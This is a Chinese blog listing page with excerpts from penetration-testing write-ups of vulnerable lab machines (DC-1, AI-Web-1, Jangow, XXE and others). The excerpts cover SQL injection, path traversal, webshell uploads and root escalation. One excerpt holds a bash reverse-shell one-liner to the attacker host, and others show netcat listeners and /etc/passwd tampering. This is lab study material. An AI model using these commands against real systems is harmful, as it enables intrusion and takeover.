自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 serial复现

user.class.php文件包含了log.class.php,并定义了两个类,分别是Welcome和User,User这个类中有$this->wel = new Welcome();,再看Welcome类中发现调用了handler()函数,接下来看log.class.php文件。index.php文件中包含了user.class.php文件,并对cookie中的user参数进行了判断,若user参数不存在则添加并进行了base64编码再进行序列化;发现一个目录,有一个压缩包文件,点击下载。

2024-10-08 09:06:17 428

原创 Jangow复现

删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"编辑文件 vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。首先选择标红的exp,直接看45010.c,现在要把复制到对方的服务器上面进行提权。kali监听自己的443端口:nc -lvp 443。在之前的shell.php写入反弹shell。然后进行编译以及加权限 ,然后运行。在本地的kali进行查询exp。获得 root 权限。

2024-10-08 09:04:43 702

原创 AI-Web-1复现

蚁剑虚拟终端执行:bash -c 'bash -i >& /dev/tcp/192.168.198.129/9999 0>&1'直接利用kali的openssl工具生成相应格式的密码。查询到有两个表 systemUser,user。获取到用户信息,密码经过 base64 加密。查看/etc/passwd 发现具有写的权限。把文件写入到/etc/passwd文件里面。只有 http80 端口开放。存在 SQL 注入漏洞。确定了回显点为 2 3。创建 root权限账户。成功获得 shell。

2024-10-08 09:00:21 586

原创 DC-1复现及分析

收集在某网段上存活的主机方式有很多种,常见的、易记忆的有arp-scan、nmap、netdiscover。攻击机和靶机的网络连接方式要相同,所以DC-1的网络连接方式采用NAT模式,与kali的网络连接模式相同。使用Drupal对数据库的加密方法,生成一个新密码,然后把新的密码更新到admin用户。根据题意,需要得知靶机DC-1的IP地址、IP地址开放的端口及网站的指纹信息。看到两个用户的密码被加密了,但可以修改密码或新增一个admin权限的用户。执行ls查看当前路径下的文件,可以看到flag1出现。

2024-10-08 08:56:08 1931

原创 XXE复现及分析

换思路:/robots.txt 里面有一个admin.php的文件。登录账户 administhebest/admin@123。尝试获取/etc/shadow 密码信息,失败无权限。MD5 解密获得账户密码--->admin@123。是一个登录界面,可以尝试抓一个 POST 请求包。确保靶机与 kali 在同一网段下。解码admin.php进行代码审计。2、扫描目标 ip 开放端口。发现 flag--->点击。访问 http80 端口。大概率存在XML实体注入。发现 xxe,登录一下。

2024-10-08 08:53:44 484 1

原创 Bob: 1.0.1复现

靶机初始网络模式为桥接模式,需要先更改硬件兼容性下调一个版本,然后修改网络模式为 NAT 模式,确保靶机与 kali 在同一网段下。在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的秘密目录。查看其他用户家目录,在elliot目录下找到theadminisdumb.txt文件,查看。使用得到的密码ssh远程登录jc用户,再次尝试解密 gog 文件。访问 http80 端口,发现几个目录,没有什么收获。查看文件,发现都是首字母大写,合理怀疑藏头诗。

2024-10-01 18:17:21 446

原创 W1R3S: 1.0.1复现

此处相当于是用curl方法取访问http://192.168.198.192/administrator/alerts/alertConfigField.php ,且参数为urlConfig=../../../../../../../../../etc/passwd。靶机初始桥接模式,修改网络模式为 NAT 模式,使靶机与 kali 在同一网段。尝试其他路径,发现如下路径页面有所不同,应该是读取到了文件。显示了一些前端代码,往下翻,成功发现了。发现 3 个可利用的用户。尝试读取,发现路径不对。

2024-09-30 18:57:00 604

原创 DerpNStink:1复现

找了一个有关版本的相关提权文件,有一个本地提权漏洞CVE-2021-4034, 作用有点类似于sudo,允许用户以另一个用户身份执行命令。靶机初始网络模式为桥接模式,需要修改网络模式为 NAT 模式,使靶机与 kali 在同一网段下。提示我们需要配置 hosts 文件,知道有一个derpnstink blog。使用stinky用户登录成功,在ftp中找到ssh登陆的key。发现ssh不支持密码密码登陆,只可以通过指纹登陆。访问,发现两个目录,访问没有什么有用信息。发现配置文件,获得数据库用户密码。

2024-09-28 17:25:30 1455

原创 Basic Pentesting: 1复现

靶机初始网络模式为桥接模式,需要先更改硬件兼容性,下调一个版本,然后在修改网络模式为 NAT 模式,使靶机与 kali 在同一网段下。回想端口扫描 ftp 服务版本,可能有漏洞,利用 msfconsole。开放了 3 个端口 ftp21 ssh22 http80。kali(攻击机):192.168.198.129。靶机:192.168.198.190。成功,直接获得 root 权限。访问 http80 端口。

2024-09-27 18:22:55 303

原创 The Ether: EvilScience 复现

查看当前用户权限,发现执行xxxlogauditorxxx.py文件时为 root 权限。打开图片发现有很多乱码和一部分使用base64编码的内容;kali(攻击机):192.168.198.129。开放了 2 个端口 ssh22 http80。抓包,查看数据包信息,再次尝试拼接目录。将靶机与 kali 置于同一张网卡下。靶机:192.168.198.189。访问日志文件,发现重定向到了首页。拼接命令再次访问,成功执行命令。,可能存在文件包含漏洞。成功访问到了日志文件。成功反弹 shell。

2024-09-26 18:31:21 339 1

原创 DepthB2R 复现

尝试反弹shell失败,查看进程,发现有ssh,之前没有扫到,可能是因为防火墙 -> 查看/etc下,防火墙是存在的 -> 关闭防火墙。kali(攻击机):192.168.198.129。执行反弹shell语句 -> 成功反弹。靶机:192.168.198.188。只开放了一个 http8080 端口。将靶机与 kali 置于同一网段下。,是一个debug页面,提示输入。访问 web8080 端口。

2024-09-25 17:13:10 229

原创 Dina:1.0.1复现

发现是一个 playSMS 框架的后台页面,使用 msfconsole查看是否有可利用的框架漏洞 exp。,密码还是使用之前的密码本爆破,得到结果为 diana,登录成功进入到一个 playSMS 后台界面。虚拟机默认网络模式为桥接,将网络模式修改为与 kali 一样的 NAT 模式。拼接 URL 地址访问,是一个 login 页面,用户名为。解压发现需要密码,尝试之前搜集到的密码本,发现密码为。发现 5 个不允许访问的页面有一个密码本。发现一个 zip 文件,下载下来。发现一个上传文件页面。

2024-09-24 19:42:44 658

原创 Zico2:1 复现

发现有两张网卡,需要先更改硬件兼容性,下调一个版本,然后配置靶机网络模式为 NAT 模式,与攻击机 kali 处于同一网段下。在zico的家目录中找到wordpress,这是一个免费开源的建站程序,进入该目录,查看wp-config.php。重复以上操作,将刚才的内容替换为<?创建一个数据库,再在该数据库下创建一个名称为a的表,一个字段。访问创建的数据库,页面成功显示 phpinfo 信息。发现了一个目录,点击去是一个 login 界面。使用python来反弹shell。发现了两个用户,解密后得到。

2024-09-24 10:58:10 569

原创 RickdiculouslyEasy复现

idwhoami提权成功!

2024-09-23 22:58:51 714

原创 Breach 2.1复现

我们可以在虚拟网络编辑器中添加一张网卡,网络模式为仅主机模式并将其子网IP配置在110网段,然后将靶机与 kali 置于此网卡下。切换到 tmp 目录,构造1.sh 脚本文件以实现提权,然后执行GTOFbins中给出的 sudo 命令,实现脚本利用。点击 Register ,注册成功后点击 Members 查看,发现有 XSS 漏洞。访问网站,出现一个登录框,尝试弱口令 admin/admin 登录--成功!尝试文件上传木马,使用MSF生成反弹shell木马,并上传到服务器中。

2024-09-20 11:20:43 2073

原创 Skytower:1复现

用 VMware 打开,默认网卡模式为仅主机,更改为 NAT 模式。无反应,尝试上面开放的 3128端口,可能是ssh的代理端口。点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步。使用其他用户尝试 ssh 连接,发现 sara 有权限。kali(攻击机):192.168.198.129。尝试 SQL 注入,邮箱随便输一个,密码使用。发现 mysql 数据库用户密码,尝试登录。打开点击注册,选择解压后的vbox文件。登录成功,发现一个用户密码。登录成功,查看有哪些数据库。获取到 Webshell。

2024-09-18 20:57:07 482

原创 DC-2复现

发现无法访问,ip 转为域名--->修改本地 host 文件,添加 ip 到域名 dc-2 的指向。根据题意,需要得知靶机DC-1的IP地址、IP地址开放的端口及网站的指纹信息。另一个切入点--->登入另一个账户 tom/parturient。因为CMS 为 WordPress,使用 wpscan 命令。靶机:DC-2 192.168.198.163。枚举出三个用户 admin,jerry,tom。查看一下可以使用的 root 权限命令。攻击机和靶机的网络连接方式要相同。可以使用 git 命令。

2024-09-14 17:39:29 487

原创 Kioptrix : Level 1.2复现

发现 3 个界面,点击 login 这个界面应该就是CMS后台的登录界面了。发现可以利用,提示我们输入可用 ip,也就是反弹 shell 的 ip。F10 退出再次运行sudo -l查看权限,可以看到已经有ALL权限了。将 kali 与 靶机 的网络模式设置为 NAT 模式。发现两个用户和密码的 hash,密码加密应该是md5。查看其他文件,发现一个配置文件,发现数据库账户密码。同样发现一个用户密码 admin/n0t7t1k4。没有 sudo 权限,尝试另一个用户。尝试查看/etc/passwd。

2024-09-14 17:36:44 400

原创 21 LTR Scene1复现

修改靶机和 kali 攻击机网络模式为仅主机模式置于同一张网卡下。在日志文件中写入 一句话木马,需要利用 10001 端口。添加 root权限用户成功,切换 root权限用户。将hash密码拼接 添加到/etc/passwd。发现存在hbeale用户,尝试用秘钥文件登录。连接成功,输入 ls 查看该目录下的文件。发现是个日志文件,拼接之前扫到的目录访问。发现一个文件,下载到 kali,查看。拼接参数值,写入反弹shell语句。查看/etc.passwd。失败,尝试 ftp 连接。成功反弹 shell。

2024-09-14 17:35:02 349

原创 De-ICE_S1.120复现

添加网卡,修改 kali 为仅主机模式,靶机同样也设置为仅主机模式。可能为数字型注入,使用 sqlmap 获取用户名与密码。开放了三个端口 ftp21 ssh22 http80。使用 ssh 连接(ccoffee/abc123)->添加一个项目 ->点击 Submit。sudo 执行 getlogs.sh 文件。kali 连接报错,使用本机连接成功。kali 与 靶机 置于相同网卡下。尝试 SUID 提权。发现一个.sh 文件。

2024-09-14 15:03:23 419

原创 Holynix: v1复现

输入 admin'/admin' 直接报错,暴露 SQL 查询语句,表名为 accounts,username字段有单引号转义,用户名输入 admin,密码输入。查看网页源代码,发现可以直接显示/etc/passwd 信息。上传一个文件发现失败,禁用alamo用户主目录上传。上传木马文件,访问etenenbaum 用户家目录。发现自动解压,点击执行,成功反弹到 shell。发现另外的/bin/bash 权限用户。更改网络模式为 NAT 模式。登录发现有一个文件上传界面。成功登入,再次尝试文件上传。

2024-09-14 14:58:52 455

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除